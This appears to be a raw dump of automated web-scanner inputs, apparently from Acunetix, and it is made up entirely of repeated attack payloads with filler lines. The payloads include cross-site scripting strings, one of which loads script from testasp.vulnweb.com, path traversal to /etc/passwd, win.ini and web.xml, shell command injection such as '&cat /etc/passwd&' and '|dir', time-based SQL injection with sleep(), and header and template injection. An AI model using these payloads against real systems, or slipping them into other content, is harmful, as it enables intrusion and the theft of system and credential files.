1

1

................windowswin.ini

1

1

1

1<script>prompt(972097)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(990517)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950190></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(956680)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(912643)">

1

response.write(9060381*9571827)

1

1

1

WEB-INF/web.xml

'+response.write(9060381*9571827)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(965204)"></g></svg>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

'&cat /etc/passwd&'

"+response.write(9060381*9571827)+"

1<div style=width:expression(prompt(940940))>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(979892)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921894)>

${99617+99150}

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(937962)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n911471=v900996

1

1

1<img/src=">" onerror=alert(964949)>

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

-1)

1

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1<ScRiPt%20>prompt(998314)</sCripT>

'|'ld

testasp.vulnweb.com

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

AvD2jJee'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

1&lt

1

1

^(#$!@#$)(()))******

YX7gHiDO')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1

1

\xf6<img acu onmouseover=prompt(997929) //\xf6>

1

7akFQ7BF'))

1

1

"

/etc/passwd

1

http://hitkoliyOsYzq.bxss.me/

-1

1

'

1<input autofocus onfocus=prompt(920875)>

1

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

"

<a href='http://www.acunetix.com'>website security</a>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

eA9DBRXF'

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

0cEwj5lg')

1

comments

&dir

1

1'"()&%<ScRiPt >prompt(960323)</ScRiPt>

1_FDKSw <ScRiPt >prompt(931453)</ScRiPt>

1

'"

SE1r4ZAB'))

1

'&dir&'

comments/.

'"()&%<ScRiPt >prompt(951744)</ScRiPt>

1

1

1

<!--

1

file:///etc/passwd

"&dir&"

1

1_990402

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

1

1

1

WEB-INF/web.xml

'|dir

1

1

acu4926\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4926

WEB-INF\web.xml

1

1

1

1

acux9608\xc0\xbez1\xc0\xbcz2a\x90bcxuca9608

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(967539)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(961816)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(926618)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998968></ScRiPt>

1

1<ScRiPt >prompt(959843)</ScRiPt>

................windowswin.ini

1

1

1

1<video><source onerror="javascript:prompt(903974)">

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988264)"></g></svg>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<div style=width:expression(prompt(986642))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<iframe src='data:text/html

1

1

response.write(9592876*9593353)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9592876*9593353)+'

1

1<body onload=prompt(937948)>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987186)>

1

"+response.write(9592876*9593353)+"

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img src=xyz OnErRor=prompt(961545)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1<img/src=">" onerror=alert(922038)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

-1

1<ScRiPt%20>prompt(979827)</sCripT>

1

1

`cat /etc/passwd`

1

1

${100479+100272}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

1

|cat /etc/passwd#

1

1&n991741=v951678

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

\xf6<img acu onmouseover=prompt(980004) //\xf6>

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<input autofocus onfocus=prompt(975860)>

testasp.vulnweb.com

ZhT5FiKv'

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

<a href='http://www.acunetix.com'>website security</a>

1

^(#$!@#$)(()))******

HhxgOH0z')

1

'

'"()

[url=http://www.acunetix.com]website security[/url]

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

r3X1rLhS'))

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_DtICW <ScRiPt >prompt(922400)</ScRiPt>

"

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitS02u1UfSJf.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

&dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

http://www.acunetix.tst

1

comments

1

1

"&dir&"

1

HnC1VDVB'

'"

1

1'"()&%<ScRiPt >prompt(959546)</ScRiPt>

1

1

file:///etc/passwd

comments

|dir

kfhJqOah')

<!--

'"()&%<ScRiPt >prompt(960469)</ScRiPt>

1

'|dir

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

TgDICYPg'))

1

1_937246

1

"|dir

1

WEB-INF/web.xml

1

1

1

1

1

1

acu5484\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5484

WEB-INF\web.xml

1

1

1

acux10079\xc0\xbez1\xc0\xbcz2a\x90bcxuca10079

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(980618)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<script>prompt(959074)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(974572)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988199></ScRiPt>

................windowswin.ini

1

1

1<ScRiPt >prompt(981977)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(945212)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984595)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9213248*9717207)

1

1<div style=width:expression(prompt(974037))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9213248*9717207)+'

1

1

1<iframe src='data:text/html

"+response.write(9213248*9717207)+"

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1<body onload=prompt(983999)>

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961825)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

-1

1<img src=xyz OnErRor=prompt(944036)>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

${100483+99133}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

-1)

1<img/src=">" onerror=alert(904513)>

1

1

1

1

1

1

1<ScRiPt%20>prompt(956889)</sCripT>

-1))

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n954542=v927955

1

)

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1some_inexistent_file_with_long_name%00.jpg

"|"ld

aDgfi3wW'

'"()

1

\xf6<img acu onmouseover=prompt(942548) //\xf6>

1

!(()&&!|*|*|

/etc/passwd

1

8nOVWCS1')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(914055)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

tohBeDqA'))

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

"

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

"

1

-1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1_SIV1R <ScRiPt >prompt(967840)</ScRiPt>

1

http://hits19QNXkQWV.bxss.me/

comments

1

1

||cat /etc/passwd

-1)

comments

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

file:///etc/passwd

1

-1))

comments/.

1

1

1

'&dir&'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

/\../\../\../\../\../\../\../etc/passwd

k7k4Hla1'

1

1

http://www.acunetix.tst

"&dir&"

1

1

GgwFTZXd')

WEB-INF/web.xml

1

1

1

'"

1

1'"()&%<ScRiPt >prompt(987165)</ScRiPt>

|dir

1

1

<!--

1

WEB-INF\web.xml

LEmNYNtm'))

'|dir

'"()&%<ScRiPt >prompt(984657)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1_990302

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu4734\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4734

1

1

1

................windowswin.ini

acux4226\xc0\xbez1\xc0\xbcz2a\x90bcxuca4226

1

1

1<ScRiPt >prompt(926510)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(906897)</script>

1

1<ScRiPt >prompt(912899)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988529></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(900971)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(965762)">

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936325)"></g></svg>

1

1

response.write(9977935*9528289)

1

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(940208))>

'+response.write(9977935*9528289)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<iframe src='data:text/html

"+response.write(9977935*9528289)+"

1

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1<body onload=prompt(922067)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960335)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

`cat /etc/passwd`

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(958691)>

-1)

|cat /etc/passwd#

1

${99262+99038}

1

1<img/src=">" onerror=alert(942586)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1))

1

1

'|'ld

1

1<ScRiPt%20>prompt(952007)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

1&n945932=v902733

o1Cu8nw3'

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

!(()&&!|*|*|

rgAZzoHe')

\xf6<img acu onmouseover=prompt(973094) //\xf6>

testasp.vulnweb.com

1

/etc/passwd

1

'

ULoXaWiq'))

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(981694)>

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

-1

1

"

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

http://hit1rokoGF0ne.bxss.me/

-1))

1

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

'&dir&'

1

1_mSFR7 <ScRiPt >prompt(986037)</ScRiPt>

DqST34aM'

1

1

1

1

1

"&dir&"

hhDKWpzS')

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

http://www.acunetix.tst

1

1

1

anSxqrOD'))

|dir

1

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

1

comments

1

'|dir

1'"()&%<ScRiPt >prompt(959402)</ScRiPt>

1

<!--

1

comments/.

1

WEB-INF/web.xml

"|dir

1

1

'"()&%<ScRiPt >prompt(929800)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1_904635

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu7003\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7003

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6215\xc0\xbez1\xc0\xbcz2a\x90bcxuca6215

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(969827)</ScRiPt>

................windowswin.ini

1

1

1<script>prompt(975444)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(990107)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961880></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(929767)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(983114)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954272)"></g></svg>

1

1

1<div style=width:expression(prompt(966525))>

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

1<body onload=prompt(974864)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904515)>

1

1<img src=xyz OnErRor=prompt(974980)>

1

1<img/src=">" onerror=alert(976876)>

1

1

1

1<ScRiPt%20>prompt(997291)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(924251) //\xf6>

1<input autofocus onfocus=prompt(963319)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_IWQVE <ScRiPt >prompt(916120)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9201200*9638913)

1

1

'+response.write(9201200*9638913)+'

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9201200*9638913)+"

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

${99504+99970}

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

-1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n925860=v958812

)

|cat /etc/passwd#

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

'|'ld

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

'"()

ohAqCCOr'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

'

1

1

/etc/passwd

JFwf97JK')

http://hitjgy6IPhusW.bxss.me/

1

1

"

'

acunetix_wvs_invalid_filename

1

ibt3QnRC'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

comments

1

"

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

1

<!--

1

comments/.

1'"()&%<ScRiPt >prompt(953936)</ScRiPt>

&dir

1

1

q2P6UQ7o'

1

'"()&%<ScRiPt >prompt(982930)</ScRiPt>

file:///etc/passwd

LHC2S9OH')

1

'&dir&'

1

1

/\../\../\../\../\../\../\../etc/passwd

1_998869

fuN3Ds7X'))

1

1

"&dir&"

1

WEB-INF/web.xml

1

1

|dir

acu1914\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1914

WEB-INF\web.xml

1

'|dir

1

../../../../../../../../../../windows/win.ini

acux4421\xc0\xbez1\xc0\xbcz2a\x90bcxuca4421

"|dir

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(907580)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(953836)</script>

1

1

1<ScRiPt >prompt(921921)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997781></ScRiPt>

................windowswin.ini

1<ScRiPt >prompt(929186)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(963201)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903087)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9078449*9331759)

1

1<div style=width:expression(prompt(923785))>

1

1

&cat /etc/passwd&

'+response.write(9078449*9331759)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9078449*9331759)+"

'&cat /etc/passwd&'

1<body onload=prompt(900207)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965392)>

"&cat /etc/passwd&"

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(924042)>

1

1

WEB-INF\web.xml

1

cat /etc/passwd

${99945+100198}

1<img/src=">" onerror=alert(969384)>

../../../../../../../../../../etc/passwd.jpg

1

-1

`cat /etc/passwd`

1

1

1

1

1<ScRiPt%20>prompt(984086)</sCripT>

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n921767=v903942

1

1&lt

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

)

1

1

1

"|"ld

\xf6<img acu onmouseover=prompt(954283) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

ag7nOW9P'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

'"()

1<input autofocus onfocus=prompt(913313)>

1

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

N9eckj7P')

1

"

1

'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

AQw1qYLc'))

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

1_peCVw <ScRiPt >prompt(948127)</ScRiPt>

1

1

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

&dir

http://hit2LO4Vzrmtr.bxss.me/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1

acunetix_wvs_invalid_filename

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

q7qUXXB9'

1

http://www.acunetix.tst

1

1

1

"&dir&"

'"

comments

1

1'"()&%<ScRiPt >prompt(950942)</ScRiPt>

oaTWou9g')

file:///etc/passwd

1

|dir

comments/.

1

<!--

'"()&%<ScRiPt >prompt(986550)</ScRiPt>

'|dir

63wEqlYe'))

/\../\../\../\../\../\../\../etc/passwd

1_925664

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

1

acu8026\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8026

1

WEB-INF\web.xml

1

1

acux9684\xc0\xbez1\xc0\xbcz2a\x90bcxuca9684

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(945033)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1<script>prompt(941683)</script>

1

1

1

1<ScRiPt >prompt(926348)</ScRiPt>

